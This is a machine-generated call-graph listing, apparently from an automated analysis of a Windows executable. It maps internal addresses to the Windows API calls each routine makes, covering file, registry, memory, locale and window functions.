6024->6022 6025 40335b 6024->6025 6027 4031e8 18 API calls 6024->6027 6028 403254 18 API calls 6025->6028 6026 403228 6026->5958 6027->6025 6032 403375 6028->6032 6029->6030 6030->6026 6031 4025ac 4 API calls 6030->6031 6031->6026 6033 4031e8 18 API calls 6032->6033 6034 4033a1 6033->6034 6034->5958 6036 408da8 18 API calls 6035->6036 6037 408df4 6036->6037 6037->5946 6039 405869 6038->6039 6040 405940 19 API calls 6039->6040 6041 40587b 6040->6041 6041->6041 6048 40955b 6042->6048 6043 409590 6045 40959d GetUserDefaultLangID 6043->6045 6050 409592 6043->6050 6044 409594 6054 407024 GetModuleHandleA GetProcAddress 6044->6054 6045->6050 6048->6043 6048->6044 6049 40956f 6048->6049 6049->5972 6050->6049 6051 4095cb GetACP 6050->6051 6052 4095ef 6050->6052 6051->6049 6051->6050 6052->6049 6053 409615 GetACP 6052->6053 6053->6049 6053->6052 6055 407067 6054->6055 6073 40705e 6054->6073 6056 407070 6055->6056 6057 4070a8 6055->6057 6075 406f68 6056->6075 6059 406f68 RegOpenKeyExA 6057->6059 6062 4070c1 6059->6062 6060 407089 6061 4070de 6060->6061 6078 406f5c 6060->6078 6066 40322c 4 API calls 6061->6066 6062->6061 6065 406f5c 20 API calls 6062->6065 6064 403198 4 API calls 6068 407120 6064->6068 6069 4070d5 RegCloseKey 6065->6069 6070 4070eb 6066->6070 6071 403198 4 API calls 6068->6071 6069->6061 6072 4032fc 18 API calls 6070->6072 6074 407128 6071->6074 6072->6073 6073->6064 6074->6050 6076 406f73 6075->6076 6077 406f79 RegOpenKeyExA 6075->6077 6076->6077 6077->6060 6081 406e10 6078->6081 6082 406e36 RegQueryValueExA 6081->6082 6083 406e7b 6082->6083 6089 406e59 6082->6089 6085 403198 4 API calls 6083->6085 6084 406e73 6086 403198 4 API calls 6084->6086 6087 406f47 RegCloseKey 6085->6087 6086->6083 6087->6061 6088 403278 18 API calls 6088->6089 6089->6083 6089->6084 6089->6088 6090 403420 18 API calls 6089->6090 6091 406eb0 RegQueryValueExA 6090->6091 6091->6082 6092 406ecc 6091->6092 6092->6083 6093 4034f0 18 API calls 6092->6093 6094 406f0e 6093->6094 6095 406f20 6094->6095 6097 403420 18 API calls 6094->6097 6096 4031e8 18 API calls 6095->6096 6096->6083 6097->6095 6140 406a58 6098->6140 6101 406d26 6103 406a58 19 API calls 6101->6103 6105 406d72 6101->6105 6104 406d36 6103->6104 6106 406d42 6104->6106 6109 406a34 21 API calls 6104->6109 6148 406888 6105->6148 6106->6105 6107 406d67 6106->6107 6110 406a58 19 API calls 6106->6110 6107->6105 6160 406cc8 GetWindowsDirectoryA 6107->6160 6109->6106 6113 406d5b 6110->6113 6113->6107 6116 406a34 21 API calls 6113->6116 6114 406638 19 API calls 6115 406d87 6114->6115 6117 40322c 4 API calls 6115->6117 6116->6107 6118 406d91 6117->6118 6119 4031b8 4 API calls 6118->6119 6120 406dab 6119->6120 6120->5978 6122 409244 6121->6122 6123 406638 19 API calls 6122->6123 6124 40925d 6123->6124 6125 40322c 4 API calls 6124->6125 6132 409268 6125->6132 6126 406978 20 API calls 6126->6132 6128 408dd8 18 API calls 6128->6132 6129 4033b4 18 API calls 6129->6132 6131 405890 18 API calls 6131->6132 6132->6126 6132->6128 6132->6129 6132->6131 6133 4092e4 6132->6133 6200 4091b0 6132->6200 6208 409034 6132->6208 6134 40322c 4 API calls 6133->6134 6135 4092ef 6134->6135 6136 4031b8 4 API calls 6135->6136 6137 409309 6136->6137 6138 403198 4 API calls 6137->6138 6139 409311 6138->6139 6139->5978 6141 4034f0 18 API calls 6140->6141 6142 406a6b 6141->6142 6143 406a82 GetEnvironmentVariableA 6142->6143 6147 406a95 6142->6147 6162 406dec 6142->6162 6143->6142 6144 406a8e 6143->6144 6145 403198 4 API calls 6144->6145 6145->6147 6147->6101 6157 406a34 6147->6157 6149 403414 6148->6149 6150 4068ab GetFullPathNameA 6149->6150 6151 4068b7 6150->6151 6152 4068ce 6150->6152 6151->6152 6153 4068bf 6151->6153 6154 40322c 4 API calls 6152->6154 6155 403278 18 API calls 6153->6155 6156 4068cc 6154->6156 6155->6156 6156->6114 6166 4069dc 6157->6166 6161 406ce9 6160->6161 6161->6105 6163 406dfa 6162->6163 6164 4034f0 18 API calls 6163->6164 6165 406e08 6164->6165 6165->6142 6173 406978 6166->6173 6168 4069fe 6169 406a06 GetFileAttributesA 6168->6169 6170 406a1b 6169->6170 6171 403198 4 API calls 6170->6171 6172 406a23 6171->6172 6172->6101 6183 406744 6173->6183 6175 4069b0 6178 4069c6 6175->6178 6179 4069bb 6175->6179 6177 406989 6177->6175 6190 406970 CharPrevA 6177->6190 6191 403454 6178->6191 6180 40322c 4 API calls 6179->6180 6182 4069c4 6180->6182 6182->6168 6185 406755 6183->6185 6184 4067b9 6186 406680 IsDBCSLeadByte 6184->6186 6187 4067b4 6184->6187 6185->6184 6189 406773 6185->6189 6186->6187 6187->6177 6189->6187 6198 406680 IsDBCSLeadByte 6189->6198 6190->6177 6192 403486 6191->6192 6193 403459 6191->6193 6194 403198 4 API calls 6192->6194 6193->6192 6196 40346d 6193->6196 6195 40347c 6194->6195 6195->6182 6197 403278 18 API calls 6196->6197 6197->6195 6199 406694 6198->6199 6199->6189 6201 403198 4 API calls 6200->6201 6203 4091d1 6201->6203 6205 4091fe 6203->6205 6217 4032a8 6203->6217 6220 403494 6203->6220 6206 403198 4 API calls 6205->6206 6207 409213 6206->6207 6207->6132 6209 408f70 2 API calls 6208->6209 6210 40904a 6209->6210 6211 40904e 6210->6211 6224 406a48 6210->6224 6211->6132 6214 409081 6215 408fac Wow64RevertWow64FsRedirection 6214->6215 6216 409089 6215->6216 6216->6132 6218 403278 18 API calls 6217->6218 6219 4032b5 6218->6219 6219->6203 6221 403498 6220->6221 6223 4034c3 6220->6223 6222 4034f0 18 API calls 6221->6222 6222->6223 6223->6203 6225 4069dc 21 API calls 6224->6225 6226 406a52 GetLastError 6225->6226 6226->6214 6228 406744 IsDBCSLeadByte 6227->6228 6230 406835 6228->6230 6229 40687f 6229->5996 6230->6229 6231 406680 IsDBCSLeadByte 6230->6231 6231->6230 6233 4068f3 6232->6233 6234 406820 IsDBCSLeadByte 6233->6234 6237 4068fe 6234->6237 6235 4066ea 6235->6001 6235->6002 6236 406680 IsDBCSLeadByte 6236->6237 6237->6235 6237->6236 6239 406957 6238->6239 6240 40695b 6238->6240 6239->6016 6243 406970 CharPrevA 6240->6243 6242 40696c 6242->6016 6243->6242 6818 408f30 6821 408dfc 6818->6821 6822 408e05 6821->6822 6823 403198 4 API calls 6822->6823 6824 408e13 6822->6824 6823->6822 6825 403932 6826 403924 6825->6826 6827 40374c VariantClear 6826->6827 6828 40392c 6827->6828 5388 4075c4 SetFilePointer 5389 4075f7 5388->5389 5390 4075e7 GetLastError 5388->5390 5390->5389 5391 4075f0 5390->5391 5393 40748c GetLastError 5391->5393 5396 4073ec 5393->5396 5397 407284 19 API calls 5396->5397 5398 407414 5397->5398 5399 407434 5398->5399 5400 405194 33 API calls 5398->5400 5401 405890 18 API calls 5399->5401 5400->5399 5402 407443 5401->5402 5403 403198 4 API calls 5402->5403 5404 407460 5403->5404 5404->5389 6419 4076c8 WriteFile 6420 4076e8 6419->6420 6421 4076ef 6419->6421 6423 40748c 35 API calls 6420->6423 6422 407700 6421->6422 6424 4073ec 34 API calls 6421->6424 6423->6421 6424->6422 6425 402ccc 6428 402cfe 6425->6428 6430 402cdd 6425->6430 6426 402d88 RtlUnwind 6427 403154 4 API calls 6426->6427 6427->6428 6429 402b28 RaiseException 6431 402d7f 6429->6431 6430->6426 6430->6428 6430->6429 6431->6426 6837 403fcd 6838 403f07 4 API calls 6837->6838 6839 403fd6 6838->6839 6840 403e9c 4 API calls 6839->6840 6841 403fe2 6840->6841 6438 4024d0 6439 4024e4 6438->6439 6440 4024e9 6438->6440 6441 401918 4 API calls 6439->6441 6442 402518 6440->6442 6443 40250e RtlEnterCriticalSection 6440->6443 6445 4024ed 6440->6445 6441->6440 6453 402300 6442->6453 6443->6442 6447 402525 6449 402581 6447->6449 6450 402577 RtlLeaveCriticalSection 6447->6450 6448 401fd4 14 API calls 6451 402531 6448->6451 6450->6449 6451->6447 6452 40215c 9 API calls 6451->6452 6452->6447 6454 402314 6453->6454 6457 402335 6454->6457 6458 4023b8 6454->6458 6455 402344 6455->6447 6455->6448 6456 401d80 9 API calls 6456->6458 6457->6455 6459 401b74 9 API calls 6457->6459 6458->6455 6458->6456 6461 402455 6458->6461 6463 401e84 6458->6463 6459->6455 6461->6455 6462 401d00 9 API calls 6461->6462 6462->6455 6468 401768 6463->6468 6465 401e99 6466 401ea6 6465->6466 6467 401dcc 9 API calls 6465->6467 6466->6458 6467->6466 6470 401787 6468->6470 6469 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6469->6470 6470->6469 6471 40183b 6470->6471 6472 40132c LocalAlloc 6470->6472 6474 401821 6470->6474 6477 4017d6 6470->6477 6473 4015c4 VirtualAlloc 6471->6473 6475 4017e7 6471->6475 6472->6470 6473->6475 6476 40150c VirtualFree 6474->6476 6475->6465 6476->6475 6478 40150c VirtualFree 6477->6478 6478->6475 6479 4028d2 6480 4028da 6479->6480 6481 4028ef 6480->6481 6482 403554 4 API calls 6480->6482 6483 4025ac 4 API calls 6481->6483 6482->6480 6484 4028f4 6483->6484 6842 4019d3 6843 4019ba 6842->6843 6844 4019c3 RtlLeaveCriticalSection 6843->6844 6845 4019cd 6843->6845 6844->6845 5405 407fd4 5406 407fe6 5405->5406 5408 407fed 5405->5408 5416 407f10 5406->5416 5409 408021 5408->5409 5410 408015 5408->5410 5411 408017 5408->5411 5412 40804e 5409->5412 5414 407d7c 33 API calls 5409->5414 5430 407e2c 5410->5430 5427 407d7c 5411->5427 5414->5412 5417 407f25 5416->5417 5418 407d7c 33 API calls 5417->5418 5419 407f34 5417->5419 5418->5419 5420 407f6e 5419->5420 5421 407d7c 33 API calls 5419->5421 5422 407f82 5420->5422 5423 407d7c 33 API calls 5420->5423 5421->5420 5426 407fae 5422->5426 5437 407eb8 5422->5437 5423->5422 5426->5408 5440 4058c4 5427->5440 5429 407d9e 5429->5409 5431 405194 33 API calls 5430->5431 5432 407e57 5431->5432 5448 407de4 5432->5448 5434 407e5f 5435 403198 4 API calls 5434->5435 5436 407e74 5435->5436 5436->5409 5438 407ec7 VirtualFree 5437->5438 5439 407ed9 VirtualAlloc 5437->5439 5438->5439 5439->5426 5441 4058d0 5440->5441 5442 405194 33 API calls 5441->5442 5443 4058fd 5442->5443 5444 4031e8 18 API calls 5443->5444 5445 405908 5444->5445 5446 403198 4 API calls 5445->5446 5447 40591d 5446->5447 5447->5429 5449 4058c4 33 API calls 5448->5449 5450 407e06 5449->5450 5450->5434 6485 405ad4 6486 405ae4 6485->6486 6487 405adc 6485->6487 6488 405ae2 6487->6488 6489 405aeb 6487->6489 6492 405a4c 6488->6492 6490 405940 19 API calls 6489->6490 6490->6486 6493 405a54 6492->6493 6494 405a6e 6493->6494 6495 403154 4 API calls 6493->6495 6496 405a73 6494->6496 6497 405a8a 6494->6497 6495->6493 6498 405940 19 API calls 6496->6498 6499 403154 4 API calls 6497->6499 6500 405a86 6498->6500 6501 405a8f 6499->6501 6503 403154 4 API calls 6500->6503 6502 4059b0 33 API calls 6501->6502 6502->6500 6504 405ab8 6503->6504 6505 403154 4 API calls 6504->6505 6506 405ac6 6505->6506 6506->6486 5918 40a9de 5919 40aa03 5918->5919 5920 407918 InterlockedExchange 5919->5920 5921 40aa2d 5920->5921 5922 40aa3d 5921->5922 5923 409ae8 18 API calls 5921->5923 5928 4076ac SetEndOfFile 5922->5928 5923->5922 5925 40aa59 5926 4025ac 4 API calls 5925->5926 5927 40aa90 5926->5927 5929 4076c3 5928->5929 5930 4076bc 5928->5930 5929->5925 5931 40748c 35 API calls 5930->5931 5931->5929 6849 402be9 RaiseException 6850 402c04 6849->6850 6517 402af2 6518 402afe 6517->6518 6521 402ed0 6518->6521 6522 403154 4 API calls 6521->6522 6524 402ee0 6522->6524 6523 402b03 6524->6523 6526 402b0c 6524->6526 6527 402b25 6526->6527 6528 402b15 RaiseException 6526->6528 6527->6523 6528->6527 5456 40a5f8 5499 4030dc 5456->5499 5458 40a60e 5502 4042e8 5458->5502 5460 40a613 5505 40457c GetModuleHandleA GetProcAddress 5460->5505 5464 40a61d 5513 4065c8 5464->5513 5466 40a622 5522 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5466->5522 5473 40a665 5544 406c2c 5473->5544 5477 4031e8 18 API calls 5478 40a683 5477->5478 5558 4074e0 5478->5558 5483 407918 InterlockedExchange 5486 40a6d2 5483->5486 5485 40a710 5578 4074a0 5485->5578 5486->5485 5615 409ae8 5486->5615 5488 40a751 5582 407a28 5488->5582 5489 40a736 5489->5488 5490 409ae8 18 API calls 5489->5490 5490->5488 5492 40a776 5592 408b08 5492->5592 5496 40a7bc 5497 408b08 35 API calls 5496->5497 5498 40a7f5 5496->5498 5497->5496 5625 403094 5499->5625 5501 4030e1 GetModuleHandleA GetCommandLineA 5501->5458 5503 404323 5502->5503 5504 403154 4 API calls 5502->5504 5503->5460 5504->5503 5506 404598 5505->5506 5507 40459f GetProcAddress 5505->5507 5506->5507 5508 4045b5 GetProcAddress 5507->5508 5509 4045ae 5507->5509 5510 4045c4 SetProcessDEPPolicy 5508->5510 5511 4045c8 5508->5511 5509->5508 5510->5511 5512 404624 6F571CD0 5511->5512 5512->5464 5626 405ca8 5513->5626 5523 4090f7 5522->5523 5710 406fa0 SetErrorMode 5523->5710 5526 407284 19 API calls 5527 409127 5526->5527 5528 403198 4 API calls 5527->5528 5529 40913c 5528->5529 5530 409b78 GetSystemInfo VirtualQuery 5529->5530 5531 409c2c 5530->5531 5534 409ba2 5530->5534 5536 409768 5531->5536 5532 409c0d VirtualQuery 5532->5531 5532->5534 5533 409bcc VirtualProtect 5533->5534 5534->5531 5534->5532 5534->5533 5535 409bfb VirtualProtect 5534->5535 5535->5532 5716 406bd0 GetCommandLineA 5536->5716 5538 409850 5539 4031b8 4 API calls 5538->5539 5541 40986a 5539->5541 5540 406c2c 20 API calls 5542 409785 5540->5542 5541->5473 5608 409c88 5541->5608 5542->5538 5542->5540 5543 403454 18 API calls 5542->5543 5543->5542 5545 406c53 GetModuleFileNameA 5544->5545 5546 406c77 GetCommandLineA 5544->5546 5547 403278 18 API calls 5545->5547 5553 406c7c 5546->5553 5549 406c75 5547->5549 5548 406c81 5550 403198 4 API calls 5548->5550 5554 406ca4 5549->5554 5552 406c89 5550->5552 5551 406af0 18 API calls 5551->5553 5556 40322c 4 API calls 5552->5556 5553->5548 5553->5551 5553->5552 5555 403198 4 API calls 5554->5555 5557 406cb9 5555->5557 5556->5554 5557->5477 5559 4074ea 5558->5559 5723 407576 5559->5723 5726 407578 5559->5726 5560 407516 5561 40752a 5560->5561 5562 40748c 35 API calls 5560->5562 5565 409c34 FindResourceA 5561->5565 5562->5561 5566 409c49 5565->5566 5567 409c4e SizeofResource 5565->5567 5568 409ae8 18 API calls 5566->5568 5569 409c60 LoadResource 5567->5569 5570 409c5b 5567->5570 5568->5567 5572 409c73 LockResource 5569->5572 5573 409c6e 5569->5573 5571 409ae8 18 API calls 5570->5571 5571->5569 5575 409c84 5572->5575 5576 409c7f 5572->5576 5574 409ae8 18 API calls 5573->5574 5574->5572 5575->5483 5575->5486 5577 409ae8 18 API calls 5576->5577 5577->5575 5579 4074b4 5578->5579 5580 4074c4 5579->5580 5581 4073ec 34 API calls 5579->5581 5580->5489 5581->5580 5583 407a35 5582->5583 5584 405890 18 API calls 5583->5584 5585 407a89 5583->5585 5584->5585 5586 407918 InterlockedExchange 5585->5586 5587 407a9b 5586->5587 5588 405890 18 API calls 5587->5588 5589 407ab1 5587->5589 5588->5589 5590 407af4 5589->5590 5591 405890 18 API calls 5589->5591 5590->5492 5591->5590 5594 408b39 5592->5594 5597 408b82 5592->5597 5593 408bcd 5729 407cb8 5593->5729 5594->5597 5598 4034f0 18 API calls 5594->5598 5602 403420 18 API calls 5594->5602 5603 4031e8 18 API calls 5594->5603 5607 407cb8 35 API calls 5594->5607 5596 407cb8 35 API calls 5596->5597 5597->5593 5597->5596 5600 4034f0 18 API calls 5597->5600 5605 403420 18 API calls 5597->5605 5606 4031e8 18 API calls 5597->5606 5598->5594 5599 408be4 5601 4031b8 4 API calls 5599->5601 5600->5597 5604 408bfe 5601->5604 5602->5594 5603->5594 5622 404c20 5604->5622 5605->5597 5606->5597 5607->5594 5609 40322c 4 API calls 5608->5609 5610 409cab 5609->5610 5611 409cba MessageBoxA 5610->5611 5612 409ccf 5611->5612 5613 403198 4 API calls 5612->5613 5614 409cd7 5613->5614 5614->5473 5616 409af1 5615->5616 5617 409b09 5615->5617 5619 405890 18 API calls 5616->5619 5618 405890 18 API calls 5617->5618 5621 409b1a 5618->5621 5620 409b03 5619->5620 5620->5485 5621->5485 5751 402594 5622->5751 5624 404c2b 5624->5496 5625->5501 5627 405940 19 API calls 5626->5627 5628 405cb9 5627->5628 5629 405280 GetSystemDefaultLCID 5628->5629 5633 4052b6 5629->5633 5630 404cdc 19 API calls 5630->5633 5631 40520c 19 API calls 5631->5633 5632 4031e8 18 API calls 5632->5633 5633->5630 5633->5631 5633->5632 5637 405318 5633->5637 5634 404cdc 19 API calls 5634->5637 5635 40520c 19 API calls 5635->5637 5636 4031e8 18 API calls 5636->5637 5637->5634 5637->5635 5637->5636 5638 40539b 5637->5638 5639 4031b8 4 API calls 5638->5639 5640 4053b5 5639->5640 5641 4053c4 GetSystemDefaultLCID 5640->5641 5698 40520c GetLocaleInfoA 5641->5698 5644 4031e8 18 API calls 5645 405404 5644->5645 5646 40520c 19 API calls 5645->5646 5647 405419 5646->5647 5648 40520c 19 API calls 5647->5648 5649 40543d 5648->5649 5704 405258 GetLocaleInfoA 5649->5704 5652 405258 GetLocaleInfoA 5653 40546d 5652->5653 5654 40520c 19 API calls 5653->5654 5655 405487 5654->5655 5656 405258 GetLocaleInfoA 5655->5656 5657 4054a4 5656->5657 5658 40520c 19 API calls 5657->5658 5659 4054be 5658->5659 5660 4031e8 18 API calls 5659->5660 5661 4054cb 5660->5661 5662 40520c 19 API calls 5661->5662 5663 4054e0 5662->5663 5664 4031e8 18 API calls 5663->5664 5665 4054ed 5664->5665 5666 405258 GetLocaleInfoA 5665->5666 5667 4054fb 5666->5667 5668 40520c 19 API calls 5667->5668 5669 405515 5668->5669 5670 4031e8 18 API calls 5669->5670 5671 405522 5670->5671 5672 40520c 19 API calls 5671->5672 5673 405537 5672->5673 5674 4031e8 18 API calls 5673->5674 5675 405544 5674->5675 5676 40520c 19 API calls 5675->5676 5677 405559 5676->5677 5678 405576 5677->5678 5679 405567 5677->5679 5681 40322c 4 API calls 5678->5681 5706 40322c 5679->5706 5682 405574 5681->5682 5683 40520c 19 API calls 5682->5683 5684 405598 5683->5684 5685 4055b5 5684->5685 5686 4055a6 5684->5686 5688 403198 4 API calls 5685->5688 5687 40322c 4 API calls 5686->5687 5689 4055b3 5687->5689 5688->5689 5690 4033b4 18 API calls 5689->5690 5691 4055d7 5690->5691 5692 4033b4 18 API calls 5691->5692 5693 4055f1 5692->5693 5694 4031b8 4 API calls 5693->5694 5695 40560b 5694->5695 5696 405cf4 GetVersionExA 5695->5696 5697 405d0b 5696->5697 5697->5466 5699 405233 5698->5699 5700 405245 5698->5700 5701 403278 18 API calls 5699->5701 5702 40322c 4 API calls 5700->5702 5703 405243 5701->5703 5702->5703 5703->5644 5705 405274 5704->5705 5705->5652 5708 403230 5706->5708 5707 403252 5707->5682 5708->5707 5709 4025ac 4 API calls 5708->5709 5709->5707 5714 403414 5710->5714 5713 406fee 5713->5526 5715 403418 LoadLibraryA 5714->5715 5715->5713 5717 406af0 18 API calls 5716->5717 5718 406bf3 5717->5718 5719 406c05 5718->5719 5720 406af0 18 API calls 5718->5720 5721 403198 4 API calls 5719->5721 5720->5718 5722 406c1a 5721->5722 5722->5542 5724 407578 5723->5724 5725 4075b7 CreateFileA 5724->5725 5725->5560 5727 403414 5726->5727 5728 4075b7 CreateFileA 5727->5728 5728->5560 5730 407cd3 5729->5730 5734 407cc8 5729->5734 5735 407c5c 5730->5735 5733 405890 18 API calls 5733->5734 5734->5599 5736 407c70 5735->5736 5737 407caf 5735->5737 5736->5737 5739 407bac 5736->5739 5737->5733 5737->5734 5740 407bb7 5739->5740 5741 407bc8 5739->5741 5742 405890 18 API calls 5740->5742 5743 4074a0 34 API calls 5741->5743 5742->5741 5744 407bdc 5743->5744 5745 4074a0 34 API calls 5744->5745 5746 407bfd 5745->5746 5747 407918 InterlockedExchange 5746->5747 5748 407c12 5747->5748 5749 407c28 5748->5749 5750 405890 18 API calls 5748->5750 5749->5736 5750->5749 5752 402598 5751->5752 5754 4025a2 5751->5754 5757 401fd4 5752->5757 5753 40259e 5753->5754 5755 403154 4 API calls 5753->5755 5754->5624 5754->5754 5755->5754 5758 401fe8 5757->5758 5761 401fed 5757->5761 5768 401918 RtlInitializeCriticalSection 5758->5768 5760 402012 RtlEnterCriticalSection 5762 40201c 5760->5762 5761->5760 5761->5762 5765 401ff1 5761->5765 5762->5765 5775 401ee0 5762->5775 5765->5753 5766 402147 5766->5753 5767 40213d RtlLeaveCriticalSection 5767->5766 5769 401946 5768->5769 5770 40193c RtlEnterCriticalSection 5768->5770 5771 401964 LocalAlloc 5769->5771 5770->5769 5772 40197e 5771->5772 5773 4019c3 RtlLeaveCriticalSection 5772->5773 5774 4019cd 5772->5774 5773->5774 5774->5761 5777 401ef0 5775->5777 5776 401f1c 5779 401f40 5776->5779 5786 401d00 5776->5786 5777->5776 5777->5779 5781 401e58 5777->5781 5779->5766 5779->5767 5790 4016d8 5781->5790 5785 401e75 5785->5777 5787 401d4e 5786->5787 5788 401d1e 5786->5788 5787->5788 5859 401c68 5787->5859 5788->5779 5794 4016f4 5790->5794 5791 4016fe 5815 4015c4 5791->5815 5794->5791 5796 40174f 5794->5796 5799 40175b 5794->5799 5807 401430 5794->5807 5819 40132c 5794->5819 5823 40150c 5796->5823 5798 40170a 5798->5799 5799->5785 5800 401dcc 5799->5800 5833 401d80 5800->5833 5803 40132c LocalAlloc 5804 401df0 5803->5804 5805 401df8 5804->5805 5837 401b44 5804->5837 5805->5785 5808 40143f VirtualAlloc 5807->5808 5810 40146c 5808->5810 5811 40148f 5808->5811 5827 4012e4 5810->5827 5811->5794 5814 40147c VirtualFree 5814->5811 5817 40160a 5815->5817 5816 40163a 5816->5798 5817->5816 5818 401626 VirtualAlloc 5817->5818 5818->5816 5818->5817 5820 401348 5819->5820 5821 4012e4 LocalAlloc 5820->5821 5822 40138f 5821->5822 5822->5794 5826 40153b 5823->5826 5824 401594 5824->5799 5825 401568 VirtualFree 5825->5826 5826->5824 5826->5825 5830 40128c 5827->5830 5829 4012ef 5829->5811 5829->5814 5831 401298 LocalAlloc 5830->5831 5832 4012aa 5830->5832 5831->5832 5832->5829 5832->5832 5834 401d92 5833->5834 5835 401d89 5833->5835 5834->5803 5835->5834 5842 401b74 5835->5842 5838 401b61 5837->5838 5839 401b52 5837->5839 5838->5805 5840 401d00 9 API calls 5839->5840 5841 401b5f 5840->5841 5841->5805 5845 40215c 5842->5845 5844 401b95 5844->5834 5846 40217a 5845->5846 5847 402175 5845->5847 5849 4021ab RtlEnterCriticalSection 5846->5849 5851 4021b5 5846->5851 5853 40217e 5846->5853 5848 401918 4 API calls 5847->5848 5848->5846 5849->5851 5850 4021c1 5854 4022e3 RtlLeaveCriticalSection 5850->5854 5855 4022ed 5850->5855 5851->5850 5852 402244 5851->5852 5857 402270 5851->5857 5852->5853 5856 401d80 7 API calls 5852->5856 5853->5844 5854->5855 5855->5844 5856->5853 5857->5850 5858 401d00 7 API calls 5857->5858 5858->5850 5860 401c7a 5859->5860 5861 401c9d 5860->5861 5862 401caf 5860->5862 5872 40188c 5861->5872 5864 40188c 3 API calls 5862->5864 5865 401cad 5864->5865 5866 401b44 9 API calls 5865->5866 5871 401cc5 5865->5871 5867 401cd4 5866->5867 5868 401cee 5867->5868 5882 401b98 5867->5882 5887 4013a0 5868->5887 5871->5788 5873 4018b2 5872->5873 5881 40190b 5872->5881 5891 401658 5873->5891 5876 40132c LocalAlloc 5877 4018cf 5876->5877 5878 4018e6 5877->5878 5879 40150c VirtualFree 5877->5879 5880 4013a0 LocalAlloc 5878->5880 5878->5881 5879->5878 5880->5881 5881->5865 5883 401b9d 5882->5883 5884 401bab 5882->5884 5885 401b74 9 API calls 5883->5885 5884->5868 5886 401baa 5885->5886 5886->5868 5888 4013ab 5887->5888 5889 4013c6 5888->5889 5890 4012e4 LocalAlloc 5888->5890 5889->5871 5890->5889 5894 40168f 5891->5894 5892 4016cf 5892->5876 5893 4016a9 VirtualFree 5893->5894 5894->5892 5894->5893 6851 402dfa 6852 402e26 6851->6852 6853 402e0d 6851->6853 6855 402ba4 6853->6855 6856 402bc9 6855->6856 6857 402bad 6855->6857 6856->6852 6858 402bb5 RaiseException 6857->6858 6858->6856 6859 4075fa GetFileSize 6860 407626 6859->6860 6861 407616 GetLastError 6859->6861 6861->6860 6862 40761f 6861->6862 6863 40748c 35 API calls 6862->6863 6863->6860 6864 406ffb 6865 407008 SetErrorMode 6864->6865 6533 403a80 CloseHandle 6534 403a90 6533->6534 6535 403a91 GetLastError 6533->6535 6536 404283 6537 4042c3 6536->6537 6538 403154 4 API calls 6537->6538 6539 404323 6538->6539 6866 404185 6867 4041ff 6866->6867 6868 403154 4 API calls 6867->6868 6869 4041cc 6867->6869 6870 404323 6868->6870 6540 403e87 6541 403e4c 6540->6541 6542 403e67 6541->6542 6543 403e62 6541->6543 6544 403e7b 6541->6544 6547 403e78 6542->6547 6553 402674 6542->6553 6549 403cc8 6543->6549 6546 402674 4 API calls 6544->6546 6546->6547 6551 403cd6 6549->6551 6550 403ceb 6550->6542 6551->6550 6552 402674 4 API calls 6551->6552 6552->6550 6554 403154 4 API calls 6553->6554 6555 40267a 6554->6555 6555->6547 6564 407e90 6565 407eb8 VirtualFree 6564->6565 6566 407e9d 6565->6566 6569 403e95 6571 403e4c 6569->6571 6570 403e67 6576 403e78 6570->6576 6577 402674 4 API calls 6570->6577 6571->6570 6572 403e62 6571->6572 6573 403e7b 6571->6573 6574 403cc8 4 API calls 6572->6574 6575 402674 4 API calls 6573->6575 6574->6570 6575->6576 6577->6576 6578 40ac97 6587 4096fc 6578->6587 6581 402f24 5 API calls 6582 40aca1 6581->6582 6583 403198 4 API calls 6582->6583 6584 40acc0 6583->6584 6585 403198 4 API calls 6584->6585 6586 40acc8 6585->6586 6596 4056ac 6587->6596 6589 409745 6593 403198 4 API calls 6589->6593 6590 409717 6590->6589 6602 40720c 6590->6602 6592 409735 6595 40973d MessageBoxA 6592->6595 6594 40975a 6593->6594 6594->6581 6594->6582 6595->6589 6597 403154 4 API calls 6596->6597 6598 4056b1 6597->6598 6599 4056c9 6598->6599 6600 403154 4 API calls 6598->6600 6599->6590 6601 4056bf 6600->6601 6601->6590 6603 4056ac 4 API calls 6602->6603 6604 40721b 6603->6604 6605 407221 6604->6605 6606 40722f 6604->6606 6607 40322c 4 API calls 6605->6607 6609 40724b 6606->6609 6610 40723f 6606->6610 6608 40722d 6607->6608 6608->6592 6620 4032b8 6609->6620 6613 4071d0 6610->6613 6614 40322c 4 API calls 6613->6614 6615 4071df 6614->6615 6616 4071fc 6615->6616 6617 406950 CharPrevA 6615->6617 6616->6608 6618 4071eb 6617->6618 6618->6616 6619 4032fc 18 API calls 6618->6619 6619->6616 6621 403278 18 API calls 6620->6621 6622 4032c2 6621->6622 6622->6608 6623 403a97 6624 403aac 6623->6624 6625 403bbc GetStdHandle 6624->6625 6626 403b0e CreateFileA 6624->6626 6632 403ab2 6624->6632 6627 403c17 GetLastError 6625->6627 6640 403bba 6625->6640 6626->6627 6628 403b2c 6626->6628 6627->6632 6630 403b3b GetFileSize 6628->6630 6628->6640 6630->6627 6633 403b4e SetFilePointer 6630->6633 6631 403be7 GetFileType 6631->6632 6635 403c02 CloseHandle 6631->6635 6633->6627 6636 403b6a ReadFile 6633->6636 6635->6632 6636->6627 6637 403b8c 6636->6637 6638 403b9f SetFilePointer 6637->6638 6637->6640 6638->6627 6639 403bb0 SetEndOfFile 6638->6639 6639->6627 6639->6640 6640->6631 6640->6632 6645 40aaa2 6646 40aad2 6645->6646 6647 40aadc CreateWindowExA SetWindowLongA 6646->6647 6648 405194 33 API calls 6647->6648 6649 40ab5f 6648->6649 6650 4032fc 18 API calls 6649->6650 6651 40ab6d 6650->6651 6652 4032fc 18 API calls 6651->6652 6653 40ab7a 6652->6653 6654 406b7c 19 API calls 6653->6654 6655 40ab86 6654->6655 6656 4032fc 18 API calls 6655->6656 6657 40ab8f 6656->6657 6658 4099ec 43 API calls 6657->6658 6659 40aba1 6658->6659 6660 4098cc 19 API calls 6659->6660 6661 40abb4 6659->6661 6660->6661 6662 40abed 6661->6662 6663 4094d8 9 API calls 6661->6663 6664 40ac06 6662->6664 6667 40ac00 RemoveDirectoryA 6662->6667 6663->6662 6665 40ac1a 6664->6665 6666 40ac0f DestroyWindow 6664->6666 6668 40ac42 6665->6668 6669 40357c 4 API calls 6665->6669 6666->6665 6667->6664 6670 40ac38 6669->6670 6671 4025ac 4 API calls 6670->6671 6671->6668 6883 405ba2 6885 405ba4 6883->6885 6884 405be0 6888 405940 19 API calls 6884->6888 6885->6884 6886 405bf7 6885->6886 6887 405bda 6885->6887 6891 404cdc 19 API calls 6886->6891 6887->6884 6889 405c4c 6887->6889 6892 405bf3 6888->6892 6890 4059b0 33 API calls 